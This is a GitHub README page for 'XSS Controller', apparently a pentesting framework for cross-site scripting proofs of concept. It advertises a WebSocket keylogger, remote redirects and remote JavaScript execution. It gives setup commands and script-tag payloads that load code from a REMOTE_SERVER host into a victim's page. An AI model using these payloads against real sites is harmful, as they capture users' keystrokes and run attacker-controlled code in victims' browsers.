XSS Controller

XSS Controller is a framework to deliver malicious javascript inside XSS payloads and make better PoC to demonstrate the impact of successful XSS exploration.

Features

KeyLogger via WebSocket
Remote redirect
Remote JavaScript Execution

Setup

./setup.sh
npm i

Running

npm start

Inject XSS payload to invoke remote javascript.

<script src="https://REMOTE_SERVER:8443/"></script>

<script src="http://REMOTE_SERVER:8080/"></script>

By default the server is up in 8080 port to HTTP Server and 8443 to HTTPS. This config can be changed in /app/server.js in config variable.

// Config ports to listen on
const config = {
  HTTPS_PORT: 8443,
  HTTP_PORT: 8080,
  WEB_SOCKET_PORT: 3000,
};

Execution

npm i
npm start

Inspíration

This project was created based on xss-keylogger by hadynz.

Name		Name	Last commit message	Last commit date
Latest commit History 20 Commits
app		app
public		public
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
package-lock.json		package-lock.json
package.json		package.json
setup.sh		setup.sh

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

XSS Controller

Features

Setup

Running

Execution

Inspíration

About

Releases

Packages

Languages

License

luca-regne/xss-controller

Folders and files

Latest commit

History

Repository files navigation

XSS Controller

Features

Setup

Running

Execution

Inspíration

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages